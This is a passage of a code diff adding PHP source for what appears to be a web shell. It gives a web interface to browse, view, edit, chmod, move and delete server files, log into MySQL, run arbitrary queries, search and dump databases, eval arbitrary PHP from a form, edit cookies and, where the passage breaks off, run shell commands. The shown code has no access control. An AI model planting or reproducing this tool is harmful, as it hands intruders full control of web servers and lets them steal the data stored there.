+					.((($i+$NOWi)==0)?'<span '.DxDesign_DrawBubbleBox('Perms legend', '1st: sticky bit:<br>"<b>S</b>" Socket, "<b>L</b>" Symbolic Link, "<b>&lt;empty&gt;</b>" Regular, "<b>B</b>" Block special, "<b>D</b>" Directory, "<b>C</b>" Character special, "<b>P</b>" FIFO Pipe, "<b>?</b>" Unknown<br>Others: Owner/Group/World<br>"<b>r</b>" Read, "<b>w</b>" Write, "<b>x</b>" Execute<br><br><b>Click to CHMOD', 400).' class=Hover>':'')
+					.'<a href="'.DxURL('kill', '').'&dxmode=F_CHM&dxfile='.DxFileToUrl($dircur).'" class=no>'.DxChmod_Oct2Str(@fileperms($dircur)).'</td>';
+				}
+
+			if ($NOW!='DIRS') print "\n\t".'<td class=linelisting style="text-align:right;">'.DxStr_FmtFileSize(@filesize($dircur)).'</td>';
+
+			if (!isset($_GET['dxdirsimple']))
+				{
+				if ($NOW=='DIRS') print "\n\t".'<td class=linelisting colspan='.(($GLOB['SYS']['GZIP']['IMG'])?'4':'3').'>&nbsp;</td>';
+				if ($NOW!='DIRS') print "\n\t".'<td class=linelisting><a href="'.DxURL('kill', '').'&dxmode=F_DWN&dxparam=SRC&dxfile='.DxFileToUrl($dircur).'" target=_blank>'.DxImg('view').'</a></td>';
+				if ($NOW!='DIRS') print "\n\t".'<td class=linelisting><a href="'.DxURL('kill', '').'&dxmode=F_ED&dxfile='.DxFileToUrl($dircur).'">'.DxImg('ed').'</a></td>';
+				if ($NOW!='DIRS') print "\n\t".'<td class=linelisting><a href="'.DxURL('kill', '').'&dxmode=F_DWN&dxfile='.DxFileToUrl($dircur).'">'.DxImg('downl').'</a></td>';
+				if (($NOW!='DIRS') AND ($GLOB['SYS']['GZIP']['IMG'])) print "\n\t".'<td class=linelisting><a href="'.DxURL('kill', '').'&dxmode=F_DWN&dx_gzip=Yeah&dxfile='.DxFileToUrl($dircur).'">'.DxImg('gzip').'</a></td>';
+				print "\n\t".'<td class=linelisting><a href="'.DxURL('kill', '').'&dxmode=F_REN&dxfile='.DxFileToUrl($dircur).'">'.DxImg('rename').'</a></td>';
+				print "\n\t".'<td class=linelisting '.(($NOW=='DIRS')?'colspan=3':'').'><a href="'.DxURL('kill', '').'&dxmode=F_DEL&dxfile='.DxFileToUrl($dircur).'">'.DxImg('del').'</a></td>';
+				if ($NOW!='DIRS') print "\n\t".'<td class=linelisting><a href="'.DxURL('kill', '').'&dxmode=F_COP&dxfile='.DxFileToUrl($dircur).'">'.DxImg('copy').'</a></td>';
+				if ($NOW!='DIRS') print "\n\t".'<td class=linelisting><a href="'.DxURL('kill', '').'&dxmode=F_MOV&dxfile='.DxFileToUrl($dircur).'">'.DxImg('move').'</a></td>';
+				}
+			print "\n\t".'</tr>';
+			}
+	print "\n".'</table>';
+	}
+
+
+########
+########   File Global Actions
+########
+if ('F_'==substr($_GET['dxmode'],0,2))
+	{
	if (empty($_GET['dxfile']))
+		{
		print "\n".'<form action="'.DxURL('kill', '').'" method=GET>';
+		DxGETinForm('leave', '');
+		print "\n".'<input type=text name="dxfile" value="" style="width:70%;">';
+		print "\n".'<br><input type=submit value="Select" class="submit">';
+		print "\n".'</form>';
+		}
+	if (!file_exists(@$_GET['dxfile']))  die(DxError('No such file'));
+	print "\n\n".'<a href="'.DxURL('kill', '').'&dxmode=DIR&dxdir='.DxFileToUrl(dirname($_GET['dxfile'])).'">[Go DIR]</a>';
+	}
+
+########
+########   File CHMOD
+########
+if ($_GET['dxmode']=='F_CHM')
+	{
+	if (isset($_GET['dxparam']))
+		{
		if (chmod($_GET['dxfile'], octdec((int)$_GET['dxparam']))==FALSE)
+			print DxError('Chmod "'.$_GET['dxfile'].'" failed');
+			else print 'CHMOD( <font class=highlight_txt>'.$_GET['dxfile'].'</b></font> )...<b>OK</b>';
+		}
+		else
+		{
		print "\n".'<form action="'.DxURL('kill', '').'" method=GET>';
+		DxGETinForm('leave', 'dxmode,dxfile');
+		print "\n".'CHMOD( <font class=highlight_txt>'.$_GET['dxfile'].'</font> )';
+		print "\n".'<br><input type=text name="dxparam" value="'.
+			//decoct(fileperms($_GET['dxfile']))
+			substr(sprintf('%o', fileperms($_GET['dxfile'])), -4)
+			.'">';
+		print "\n".'<input type=submit value="chmod" class="submit"></form>';
+		}
+	}
+
+########
+########   File View
+########
+if ($_GET['dxmode']=='F_VIEW')
+	{
+	if (!is_file($_GET['dxfile']))  	die(DxError('Hey! Find out how to read a directory in notepad, and u can call me "Lame" =) '));
+	if (!is_readable($_GET['dxfile']))  die(DxError('File is not readable. Perms?...'));
+
+	print "\n".'<table border=0 cellspacing=0 cellpadding=0 align=right><tr>';
+	print "\n".'<td><h3>'.$_GET['dxfile'].'</h3></td>';
+	print "\n".'<td>'
+		.'<a href="'.DxURL('kill', '').'&dxmode=F_DWN&dxparam=SRC&dxfile='.DxFileToUrl($_GET['dxfile']).'" target=_blank>'.DxImg('view').'</a>'
+		.'<a href="'.DxURL('kill', '').'&dxmode=F_ED&dxfile='.DxFileToUrl($_GET['dxfile']).'">'.DxImg('ed').'</a>'
+		.'<a href="'.DxURL('kill', '').'&dxmode=F_DWN&dxfile='.DxFileToUrl($_GET['dxfile']).'">'.DxImg('downl').'</a>'
+		.'<a href="'.DxURL('kill', '').'&dxmode=F_DEL&dxfile='.DxFileToUrl($_GET['dxfile']).'">'.DxImg('del').'</a>'
+		.'</td>';
+	print "\n".'</tr></table><br>';
+	print "\n".'Tip: to view the file "as is" - open the page in <a href="'.DxURL('kill', '').'&dxmode=F_DWN&dxparam=SRC&dxfile='.DxFileToUrl($_GET['dxfile']).'">source</a> (<i>works best in Opera</i>), or <a href="'.DxURL('kill', '').'&dxmode=F_DWN&dxfile='.DxFileToUrl($_GET['dxfile']).'">download</a> this file';
+
+	print "\n\n\n".'<br><hr><!-- File contents goes from here -->'."\n";
+	print "\n".'<plaintext>';
+	print file_get_contents($_GET['dxfile']);
+	die(); /* Plaintext is infinite */
+	}
+
+########
+########   File Edit
+########
+if ($_GET['dxmode']=='F_ED')
+	{
+	if (!is_file($_GET['dxfile']))  	die(DxError('Hey! Find out how to read a directory in notepad, and u can call me "Lame" =) '));
+	if (isset($_POST['dxparam']))
+		{
		if (!is_writable($_GET['dxfile']))  die(DxError('File is not writable. Perms?...'));
+		if (($f=fopen($_GET['dxfile'], 'w'))===FALSE) die(DxError('File open for WRITE failed'));
+		if (fputs($f, $_POST['dxparam'])===FALSE)	die(DxError('I/O: File write failed'));
+		fclose($f);
+		print 'File saved OK;';
+		}
+		else
+		{
+		if (!is_readable($_GET['dxfile']))  die(DxError('File is not readable. Perms?...'));
+		if (!is_writable($_GET['dxfile'])) DxWarning('File is not writable!');
		print "\n".'<font class=highlight_txt>'.$_GET['dxfile'].'</font>';
+		print "\n".'<form action="'.DxURL('leave', '').'" method=POST>';
+		print "\n".'<textarea name="dxparam" rows=30 style="width:90%;">'.str_replace(array('<','>'),array('&lt;','&gt;'), file_get_contents($_GET['dxfile'])).'</textarea>';
+		print "\n".'<br><input type=submit value="Save" style="width:100pt;height:50pt;font-size:15pt;" class=submit>';
+		print "\n".'</form>';
+		}
+	}
+
+########
+########   File Delete
+########
+if ($_GET['dxmode']=='F_DEL')
+	{
		if (isset($_GET['dx_ok']))
+			{
		if ($_GET['dx_ok']=='Yes')
+			{
			if (	(is_file($_GET['dxfile']) AND !unlink($_GET['dxfile']))  OR  (is_dir($_GET['dxfile']) AND !rmdir($_GET['dxfile']))		)
+				print DxError('Unable to delete file. Perms?...<br>');
+				else
+				{
				print "\n".'Delete( <font class=highlight_txt>'.$_GET['dxfile'].'</font> ) <b>OK</b>';
+				DxGotoURL(DxURL('kill', '').'&dxmode=DIR&dxdir='.DxFileToUrl(dirname($_GET['dxfile'])));
+				}
+			}
+		}
+		else
+		{
+		if (!is_writable($_GET['dxfile'])) DxWarning('File is not writable!');
		print "\n".'<form action="'.DxURL('kill', '').'" method=GET>';
+		DxGETinForm('leave', 'dxmode,dxfile');
+		print "\n".'<table border=0 cellspacing=0 cellpadding=0 align=center><tr><td>'
+					."\n".'<font class=achtung>(!)</font> Do you really want to <font class=highlight_txt>DELETE '.$_GET['dxfile'].'</font> ?'
+					."\n".'<div align=right><input type=submit name="dx_ok" value="No" class=bt_No><input type=submit name="dx_ok" value="Yes" class=bt_Yes>'
+					."\n".'</td></tr></table>';
+		print "\n".'</form>';
+		}
+	}
+
+########
+########   File Rename
+########
+if ($_GET['dxmode']=='F_REN')
+	{
+	if (isset($_POST['dxparam']))
+		{
+		if (!rename($_GET['dxfile'], dirname($_GET['dxfile']).'/'.$_POST['dxparam']))
+			print DxError('Unable to rename. Perms?...<br>');
+			else
+			{
+			print "\n".'Rename( <font class=highlight_txt>'.$_GET['dxfile'].'</font> -> <font class=highlight_txt>'.dirname($_GET['dxfile']).'/'.$_POST['dxparam'].'</font> ) <b>OK</b>';
+			DxGotoURL(DxURL('kill', '').'&dxmode=DIR&dxdir='.DxFileToUrl(dirname($_GET['dxfile'])));
+			}
+		}
+		else
+		{
+		print "\n".'<form action="'.DxURL('leave', 'dxmode,dxfile').'" method=POST>';
+		print "\n".'<input type=text name="dxparam" value="'.basename($_GET['dxfile']).'" style="width:80%">';
+		print "\n".'<input type=submit value="Rename" class="submit"></form>';
+		}
+	}
+
+########
+########   File Copy
+########
+if ($_GET['dxmode']=='F_COP')
+	{
+	if (!is_file($_GET['dxfile'])) die(DxError('Don\'t even think about copuing directories! =))'));
+
+	$newname=$_GET['dxfile'].'__DxS_COPY_'.DxRandomChars(3);
+	if (($extpos=strrpos($_GET['dxfile'], '.'))>strrpos($_GET['dxfile'], '/')) /* file has an extension */
+		$newname=substr($_GET['dxfile'], 0, $extpos).'__DxS_COPY_'.DxRandomChars(3).substr($_GET['dxfile'], $extpos);
+	print $newname;
+	if (!copy($_GET['dxfile'], $newname))
+		print DxError('Unable to copy. Perms?...<br>');
+		else
+		{
+		print "\n".'Copy( <font class=highlight_txt>'.$_GET['dxfile'].'</font> -> <font class=highlight_txt>'.$newname.'</font> ) <b>OK</b>';
+		DxGotoURL(DxURL('kill', '').'&dxmode=DIR&dxdir='.DxFileToUrl(dirname($_GET['dxfile'])));
+		}
+	}
+
+########
+########   File Move
+########
+if ($_GET['dxmode']=='F_MOV')
+	{
+	if (isset($_POST['dxparam']))
+		{
+		if (!rename($_GET['dxfile'], $_POST['dxparam']))
+			print DxError('Unable to rename. Perms? Or no path?...<br>');
+			else
+			{
+			print "\n".'Move( <font class=highlight_txt>'.$_GET['dxfile'].'</font> -> <font class=highlight_txt>'.$_POST['dxparam'].'</font> ) <b>OK</b>';
+			DxGotoURL(DxURL('kill', '').'&dxmode=DIR&dxdir='.DxFileToUrl(dirname($_POST['dxparam'])));
+			}
+		}
+		else
+		{
+		if (!is_writable($_GET['dxfile'])) DxWarning('File is not writable!');
+		print "\n".'<form action="'.DxURL('leave', 'dxmode,dxfile').'" method=POST>';
+		print "\n".'<input type=text name="dxparam" value="'.DxFileOkaySlashes(realpath($_GET['dxfile'])).'" style="width:80%">';
+		print "\n".'<input type=submit value="M0ve" class="submit"></form>';
+		}
+	}
+
+if (substr($_GET['dxmode'],0,2)=='F_')
+	{/* file actions */
+	print "\n\n".'<br><br>'.'<a href="'.DxURL('kill', '').'&dxmode=DIR&dxdir='.DxFileToUrl(dirname($_GET['dxfile'])).'">[Go DIR]</a>';
+	}
+
+		###################################
+
+########
+########   SQL Maintenance
+########
+if ($_GET['dxmode']=='SQL')
+	{
	if (!isset($_GET['dxsql_s'], $_GET['dxsql_l'], $_GET['dxsql_p']))
+		{
		print "\n".'<h2>MySQL connection</h2>';
+		print "\n".'<form action="'.DxURL('kill', '').'" method=GET align=center>';
+		DxGETinForm('leave', 'dxmode');
+		print "\n".'<br>Serv: <input type=text name="dxsql_s" value="localhost" style="width:200pt">';
+		print "\n".'<br>Login:<input type=text name="dxsql_l" value="" 	 	style="width:200pt">';
+		print "\n".'<br>Passw:<input type=password name="dxsql_p" value="" 	style="width:200pt">';
+		print "\n".'<br><input type=submit value="C0nnect" class="submit" style="width:200pt;"></form>';
+		die();
+		}
+	if ((mysql_connect($_GET['dxsql_s'],$_GET['dxsql_l'],$_GET['dxsql_p'])===FALSE) or (mysql_errno()!=0))
+		die(DxError('No connection to mysql server!'."\n".'<br>MySQL:#'.mysql_errno().' - '.mysql_error()));
+		else print '&gt;&gt; MySQL connected!';
+
+	$mysqlver=mysql_fetch_row(mysql_query("SELECT VERSION()"));
+	print str_repeat('&nbsp;',15).'MySQL version: <font class="highlight_txt">'.$mysqlver[0].'</font>';
+
+	DxMySQL_FetchResult(DxMySQLQ('SHOW DATABASES;', true), $DATABASES, true);
+	for ($i=0;$i<count($DATABASES);$i++)
+		$DATABASES[$i][1]=mysql_num_rows(DxMySQLQ('SHOW TABLES FROM `'.$DATABASES[$i][0].'`;', false));
+
+	print "\n".'<table border=0 cellspacing=0 cellpadding=0>'
+				.'<tr><td class=h2_oneline><h1>DB:</h1></td>';
+	if (!isset($_GET['dxsql_d']))
+		{
+		print "\n".'<td class=h2_oneline style="border-width:0pt;">';
+		print "\n".'<form action="'.DxURL('kill', '').'" method=GET>';
+		DxGETinForm('leave', 'dxmode,dxsql_s,dxsql_l,dxsql_p');
+		print "\n".'<SELECT name="dxsql_d" onchange="this.form.submit()">';
+		print "\n\t".'<OPTION value="">&lt;Server&gt;</OPTION>';
+		for ($i=0;$i<count($DATABASES);$i++)
+		print "\n\t".'<OPTION value="'.$DATABASES[$i][0].'">'
+			.'['.DxZeroedNumber($DATABASES[$i][1],3).']'.' '.$DATABASES[$i][0]
+			.'</OPTION>';
+		print "\n".'</SELECT><input type=submit value="-&gt;" class=submit"></form></td>';
+		print "\n".'</tr></table>';
+		die();
+		}
+		else print "\n".'<td class=linelisting><font class=highlight_txt>'.((empty($_GET['dxsql_d']))?'&lt;Server&gt;':$_GET['dxsql_d']).'</font></td>'
+						.'<td class=linelisting><a href="'.DxURL('kill', 'dxsql_d').'" class=no>[CH]</a></td>'
+						.'<td class=linelisting><a href="'.DxURL('kill', 'dxmode').'&dxmode=SQLS" class=no>[Search in tables...]</a></td>'
+						.'<td class=linelisting><a href="'.DxURL('kill', 'dxmode').'&dxmode=SQLD" class=no>[Dump...]</a></td>'
+						.'</tr></table>';
+
+	if (!empty($_GET['dxsql_d']))
+		if (!mysql_select_db($_GET['dxsql_d']))
+			die(DxError('Can\'t select database!'."\n".'<br>MySQL:#'.mysql_errno().' - '.mysql_error()));
+
+	print "\n".'<table border=0 cellspacing=0 cellpadding=0 width=100%>';
+	print "\n".'<tr><td width=1% class=h2_oneline style="vertical-align:top;">';
+	if (!empty($_GET['dxsql_d']))
+		{
+		print "\n\t".'<table  border=0 cellspacing=0 cellpadding=0>';
+		print "\n\t".'<caption>Tables:</caption>';
+		DxMySQL_FetchResult(DxMySQLQ('SHOW TABLES;', true), $TABLES, true);
+		for ($i=0;$i<count($TABLES);$i++) $TABLES[$i]=$TABLES[$i][0];
+		asort($TABLES);
+		for ($i=0;$i<count($TABLES);$i++)
+			{
+			DxMySQL_FetchResult(DxMySQLQ('SELECT COUNT(*) FROM `'.$TABLES[$i].'`;', true), $TRowCnt, true);
			print "\n\t".'<tr><td class="listing"><nobr>'.(($TRowCnt[0][0]>0)?'&gt; ':'&nbsp;&nbsp;').$TABLES[$i].'</td></tr>';
+			}
+		print "\n\t".'</table>';
+		}
+	print "\n".'</td><td  width=100%>';
+	print "\n".'<form action="'.DxURL('leave', '').'" method=POST>';
+	print "\n".'[?] Can run several querys if divided by ";"<br>If smth is wrong with charset, write first: SET NAMES cp1251;';
+	print "\n".'<textarea name="dxsql_q" rows=10 style="width:100%;">'.((empty($_POST['dxsql_q']))?'':$_POST['dxsql_q']).'</textarea>';
+	print "\n".'<div align=right>'
+				.'<input type=submit value="Query" class="submit"> '
+				.'<input type=submit name="dxparam" value="Download Query" class="submit"></div></form>'
+				.'<br>';
+
+	if (empty($_POST['dxsql_q'])) die('</td></tr></table>');
+	$_POST['dxsql_q']=explode(';', $_POST['dxsql_q']);
+
+	foreach ($_POST['dxsql_q'] as $CUR_Q)
+		{
		if (empty($CUR_Q)) continue;
+		$CUR_Q.=';';
+
+		$num=DxMySQL_FetchResult(DxMySQLQ($CUR_Q, true), $FETCHED, false);
+		if ($num<=0) continue;
+
+		print "\n\n\n".'<table border=0 cellspacing=0 cellpadding=0><caption>'.$CUR_Q.'</caption>';
+
+		$INDEXES=array_keys($FETCHED[0]);
+		print "\n\t".'<tr><td class="listing" colspan='.(count($INDEXES)+1).'>&gt;&gt; Fetched: '.$num. str_repeat('&nbsp;', 10). 'Affected: '.mysql_affected_rows().'</td></tr>';
+		print "\n\t".'<tr><td class="listing"><div align=center  class="highlight_txt">###</td>';
+		foreach ($INDEXES as $key) print '<td class="listing"><div align=center class="highlight_txt">'.$key.'</td>';
+		print '</tr>';
+
+		for ($l=0;$l<count($FETCHED);$l++)
+			{
+			print "\n\t".'<tr><td class="listing" width=40><div align=right class="highlight_txt">'.$l.'</td>';
+			for ($i=0; $i<count($INDEXES); $i++)
+				print '<td class="listing"> '.DxDecorVar($FETCHED[$l][ $INDEXES[$i] ], true).'</td>';
+			}
+
+		print "\n".'</table><br>';
+		}
+	print "\n".'</td></tr></table>';
+	}
+
+########
+########   SQL Search
+########
+if ($_GET['dxmode']=='SQLS')
+	{
+	if (!isset($_GET['dxsql_s'], $_GET['dxsql_l'], $_GET['dxsql_p'], $_GET['dxsql_d']))	die(DxError('SQL server/login/password/database are not set'));
+
+	if ((mysql_connect($_GET['dxsql_s'],$_GET['dxsql_l'],$_GET['dxsql_p'])===FALSE) or (mysql_errno()!=0))
+		die(DxError('No connection to mysql server!'."\n".'<br>MySQL:#'.mysql_errno().' - '.mysql_error()));
+		else print '&gt;&gt; MySQL connected!';
+
+	if (!mysql_select_db($_GET['dxsql_d']))
+		die(DxError('Can\'t select database!'."\n".'<br>MySQL:#'.mysql_errno().' - '.mysql_error()));
+
+	print "\n".'<table border=0 cellspacing=0 cellpadding=0><tr><td class=h2_oneline><h2>DB:</h2></td>';
+	print "\n".'<td class=linelisting><font class=highlight_txt>'.((empty($_GET['dxsql_d']))?'&lt;Server&gt;':$_GET['dxsql_d']).'</font></td></tr></table>';
+
+	print "\n".'<form action="'.DxURL('leave', '').'" method=POST>';
	print "\n".'<table border=0 cellspacing=0 cellpadding=0 width=100%>';
+	print "\n".'<tr><td width=1% class=h2_oneline style="vertical-align:top;">';
+
+	DxMySQL_FetchResult(DxMySQLQ('SHOW TABLES;', true), $TABLES, true);
+	for ($i=0;$i<count($TABLES);$i++) $TABLES[$i]=$TABLES[$i][0];
+	asort($TABLES);
+
+	if (isset($_POST['dxsqlsearch']['txt']))
+		if (get_magic_quotes_gpc()==1) $_POST['dxsqlsearch']['txt']=stripslashes($_POST['dxsqlsearch']['txt']);
+
+	print "\n\t".'<SELECT MULTIPLE name="dxsqlsearch[tables][]" SIZE=30>';
+	for ($i=0;$i<count($TABLES);$i++)
+		{
+		DxMySQL_FetchResult(DxMySQLQ('SELECT COUNT(*) FROM `'.$TABLES[$i].'`;', true), $TRowCnt, true);
+		if ($TRowCnt[0][0]>0)
+			print "\n\t".'<OPTION value="'.$TABLES[$i].'" '
+				.(  (isset($_POST['dxsqlsearch']['tables']))?   ((in_array($TABLES[$i], $_POST['dxsqlsearch']['tables']))?'SELECTED':'')   :'SELECTED'  ).'>'
+				.$TABLES[$i].'</OPTION>';
+		}
+	print "\n\t".'</SELECT>';
+	print "\n".'</td><td  width=100%>';
+	print "\n".'<input type=text name="dxsqlsearch[txt]" style="width:100%;" value="'.((empty($_POST['dxsqlsearch']['txt']))?'':str_replace('"', '&quot;', $_POST['dxsqlsearch']['txt'])).'">';
+	print "\n".'<br>';
+	foreach (array('Any', 'Each', 'Exact', 'RegExp') as $cur_rad)
+		print '<input type=radio name="dxsqlsearch[mode]" value="'.strtolower($cur_rad).'" '
+			.(  (isset($_POST['dxsqlsearch']['mode']))?   (($_POST['dxsqlsearch']['mode']==strtolower($cur_rad))?'CHECKED':'')   :(($cur_rad=='Any')?'CHECKED':'')  )
+			.' class=radio>'.$cur_rad.'&nbsp;&nbsp;&nbsp;';
+	print "\n".'<div align=right><input type=submit value="Search..." class=submit style="width:100pt;"></div>';
+	print "\n".'</form>';
+
+	if (!isset($_POST['dxsqlsearch'])) die('</td></tr></table>');
+
+	if (empty($_POST['dxsqlsearch']['tables'])) die(DxError('No tables selected'));
+
+	if (in_array($_POST['dxsqlsearch']['mode'], array('any', 'each'))) $_POST['dxsqlsearch']['txt']=explode(' ', mysql_real_escape_string($_POST['dxsqlsearch']['txt']));
+		else $_POST['dxsqlsearch']['txt']=array($_POST['dxsqlsearch']['txt']);
+
+
+	$GLOBALFOUND=0;
+	foreach ($_POST['dxsqlsearch']['tables'] as $CUR_TABLE)
+		{
		$Q='SELECT * FROM `'.$CUR_TABLE.'` WHERE ';
+		$Q_ARR=array();
+		DxMySQL_FetchResult(DxMySQLQ('SHOW COLUMNS FROM `'.$CUR_TABLE.'`;', true), $COLS, true);   for ($i=0; $i<count($COLS);$i++) $COLS[$i]=$COLS[$i][0];
+		foreach ($COLS as $CUR_COL)
+			{
			if (in_array($_POST['dxsqlsearch']['mode'], array('any', 'each', 'exact')))
+				{
				for ($i=0;$i<count($_POST['dxsqlsearch']['txt']);$i++)
+				$Q_ARR[]=$CUR_COL.' LIKE "%'.($_POST['dxsqlsearch']['txt'][$i]).'%"';
+				}
+				else $Q_ARR[]=$CUR_COL.' REGEXP '.$_POST['dxsqlsearch']['txt'][0];
+
+			if ($_POST['dxsqlsearch']['mode']=='each')
+				{
				$Q_ARR_EXACT[]=implode(' AND ', $Q_ARR);
+				$Q_ARR=array();
+				}
+			}
+		if (in_array($_POST['dxsqlsearch']['mode'], array('any', 'exact'))) $Q.=implode(' OR ', $Q_ARR).';';
+		if ($_POST['dxsqlsearch']['mode']=='each') $Q.=' ( '.implode(' ) OR ( ', $Q_ARR_EXACT).' );';
+		if ($_POST['dxsqlsearch']['mode']=='regexp') $Q.=' ( '.implode(' ) OR ( ',$Q_ARR).' );';
+
+		/* $Q is ready */
+
+		if (($num=DxMySQL_FetchResult(DxMySQLQ($Q, true), $FETCHED, true))>0)
+			{
+			$GLOBALFOUND+=$num;
			print "\n\n".'<table border=0 cellspacing=0 cellpadding=0 align=center><caption>'.$num.' matched in '.$CUR_TABLE.' :</caption>';
+			print "\n\t".'<tr><td class=listing><font class="highlight_txt">'.implode('</td><td class=listing><font class="highlight_txt">', $COLS).'</td></tr>';
+			for ($l=0;$l<count($FETCHED);$l++)
+				{
+				print "\n\t".'<tr>';
+				for ($i=0; $i<count($FETCHED[$l]); $i++) print '<td class="listing"> '.DxDecorVar($FETCHED[$l][$i], true).'</td>';
+				print '</tr>';
+				}
+			print "\n".'</table><br>';
+			}
+		}
+	print "\n".'<br>Total: '.$GLOBALFOUND.' matches';
+
+	print "\n".'</td></tr></table>';
+	}
+
+########
+########   SQL Dump
+########
+if ($_GET['dxmode']=='SQLD')
+	{
	if (!isset($_GET['dxsql_s'], $_GET['dxsql_l'], $_GET['dxsql_p'], $_GET['dxsql_d']))	die(DxError('SQL server/login/password/database are not set'));
+
+	if ((mysql_connect($_GET['dxsql_s'],$_GET['dxsql_l'],$_GET['dxsql_p'])===FALSE) or (mysql_errno()!=0))
+		die(DxError('No connection to mysql server!'."\n".'<br>MySQL:#'.mysql_errno().' - '.mysql_error()));
+		else print '&gt;&gt; MySQL connected!';
+
+	if (!mysql_select_db($_GET['dxsql_d']))
+		die(DxError('Can\'t select database!'."\n".'<br>MySQL:#'.mysql_errno().' - '.mysql_error()));
+
+	print "\n".'<table border=0 cellspacing=0 cellpadding=0><tr><td class=h2_oneline><h2>DB:</h2></td>';
+	print "\n".'<td class=linelisting><font class=highlight_txt>'.((empty($_GET['dxsql_d']))?'&lt;Server&gt;':$_GET['dxsql_d']).'</font></td></tr></table>';
+
+	print "\n".'<form action="'.DxURL('leave', '').'" method=POST>';
+	print "\n".'<table border=0 cellspacing=0 cellpadding=0 width=100%>';
+	print "\n".'<tr><td width=1% class=h2_oneline style="vertical-align:top;">';
+
+	DxMySQL_FetchResult(DxMySQLQ('SHOW TABLES;', true), $TABLES, true);
+	for ($i=0;$i<count($TABLES);$i++) $TABLES[$i]=$TABLES[$i][0];
+	asort($TABLES);
+
+	print "\n\t".'<SELECT MULTIPLE name="dxsql_tables[]" SIZE=30>';
+	for ($i=0;$i<count($TABLES);$i++)
+		{
+		DxMySQL_FetchResult(DxMySQLQ('SELECT COUNT(*) FROM `'.$TABLES[$i].'`;', true), $TRowCnt, true);
+		if ($TRowCnt[0][0]>0)
+			print "\n\t".'<OPTION value="'.$TABLES[$i].'" SELECTED>'.$TABLES[$i].'</OPTION>';
+		}
+	print "\n\t".'</SELECT>';
+	print "\n".'</td><td  width=100%>You can set a pre-dump-query(s) (ex: SET NAMES cp1251; ):';
+	print "\n".'<input type=text name="dxsql_q" style="width:100%;">';
+	print "\n".'<br>';
+	print "\n".'<div align=right>'
+		.'GZIP <input type=checkbox name="dx_gzip" value="Yeah, baby">'.str_repeat('&nbsp;', 10)
+		.'<input type=submit value="Dump!" class=submit style="width:100pt;"></div>';
+	print "\n".'</form>';
+	}
+
+		###################################
+
+########
+########   PHP Console
+########
+if ($_GET['dxmode']=='PHP')
+	{
+	if (isset($_GET['dxval'])) $_POST['dxval']=$_GET['dxval'];
+
+	print "\n".'<table border=0 align=right><tr><td class=h2_oneline>Do</td><td class="linelisting">';
+	$PRESETS=array_keys($GLOB['VAR']['PHP']['Presets']);
+	for ($i=0; $i<count($PRESETS);$i++)
+		print "\n\t".'<a href="'.DxURL('leave', 'dxmode').'&dxval=dxpreset__'.$PRESETS[$i].'" class=no>['.$PRESETS[$i].']</a>'
+						.(  ($i==(count($PRESETS)-1))?'':str_repeat('&nbsp;',3)  );
+	print "\n\n".'</td></tr></table><br><br>';
+
+	if (isset($_POST['dxval']))
+		if (strpos($_POST['dxval'], 'dxpreset__')===0)
+			{
			$_POST['dxval']=substr($_POST['dxval'], strlen('dxpreset__'));
+			if (!isset($GLOB['VAR']['PHP']['Presets'][$_POST['dxval']])) die(DxError('Undeclared preset'));
+			$_POST['dxval']=$GLOB['VAR']['PHP']['Presets'][$_POST['dxval']];
+			}
+
+	print "\n".'<form action="'.DxURL('leave', '').'" method=POST>';
+	print "\n".'<textarea name="dxval" rows=15 style="width:100%;">'.((isset($_POST['dxval']))?$_POST['dxval']:'').'</textarea>';
+	print "\n".'<div align=right><input type=submit value="Eval" class="submit" style="width:200pt;"></div>';
+	print "\n".'</form>';
+	if (isset($_POST['dxval']))
+		{
		print str_repeat("\n", 10).'<!--php_eval-->'."\n\n".'<table border=0 width=100%><tr><td class=listing>'."\n\n";
+		eval($_POST['dxval']);
+		print str_repeat("\n", 10).'<!--/php_eval-->'.'</td></tr></table>';
+		}
+	}
+
+		###################################
+
+########
+########  Cookies Maintenance
+########
+if ($_GET['dxmode']=='COOK')
+	{
+	if ($DXGLOBALSHIT) DxWarning('Set cookie may fail. This is because "'.basename($_SERVER['PHP_SELF']).'" has fucked up the output with it\'s shit =(');
	print 'Found <font class="highlight_txt">'.($CNT=count($_COOKIE)).' cookie'.(($CNT==1)?'':'s');
+
+	print "\n".'<div align=right><a href="'.DxURL('leave', '').'">[RELOAD]</a></div>';
+
+	print "\n".'<form action="'.DxURL('leave', '').'" method=POST>';
+	print "\n".'<table border=0 align=center><tr><td class=linelisting><div align=center><font class="highlight_txt">Cookie name</td><td class=linelisting><div align=center><font class="highlight_txt">Value</td></tr>';
+	for ($look_len=1, $maxlen=0; $look_len>=0;$look_len--)
+		{
+		if ($maxlen>100) $maxlen=100;
+		if ($maxlen<30) $maxlen=30;
+		$maxlen+=3;
+		for ($INDEXES=array_keys($_COOKIE), $i=0;$i<count($INDEXES);$i++)
+			{
+			if ($look_len) {if (strlen($_COOKIE[ $INDEXES[$i] ])>$maxlen) {$maxlen=strlen($_COOKIE[ $INDEXES[$i] ]);} continue;}
+
			print "\n".'<tr><td class=linelisting>'.$INDEXES[$i].'</td>'
+					.'<td class=linelisting><input type=text '
+							.'name="dxparam['.str_replace(array('"', "\n", "\r", "\t"),  array('&quot;',' ',' ',' '), $INDEXES[$i]).']" '
+							.'value="'.str_replace(array('"', "\n", "\r", "\t"), array('&quot;',' ',' ',' '), $_COOKIE[ $INDEXES[$i] ]).'" '
+							.'SIZE='.$maxlen.'></td>'
+					.'</tr>';
+			}
+		if (!$look_len)
+			{
+			print "\n".'<tr><td colspan=2><div align=center>[Set new cookie]</td></tr>';
+			print "\n".'<tr><td class=linelisting><input type=text name="dxparam[DXS_NEWCOOK][NAM]" value="" style="width:99%;"></td>'
+					.'<td class=linelisting><input type=text name="dxparam[DXS_NEWCOOK][VAL]" value="" SIZE='.$maxlen.'></td>'
+					.'</tr>';
			print "\n".'<tr><td class=linelisting colspan=2 style="text-align:center;">'
+					.'<input type=submit value="Save" class="submit" style="width:50%;">'
+					.'</td></tr>';
+			}
+		}
+	print "\n".'</table></form>';
+	}
+
+		###################################
+
+########
+########   Command line
+########
+if ($_GET['dxmode']=='CMD')
+	{
+	print "\n".'<table border=0 align=right><tr><td class=h2_oneline>Do</td><td>';
+	print "\n".'<SELECT name="selector" onchange="document.getElementById(\'dxval\').value+=document.getElementById(\'selector\').value+\'\n\'" style="width:200pt;">';
+	print "\n\t".'<OPTION></OPTION>';
+	$PRESETS=array_keys($GLOB['VAR']['CMD']['Presets']);
+	for ($i=0; $i<count($PRESETS);$i++)
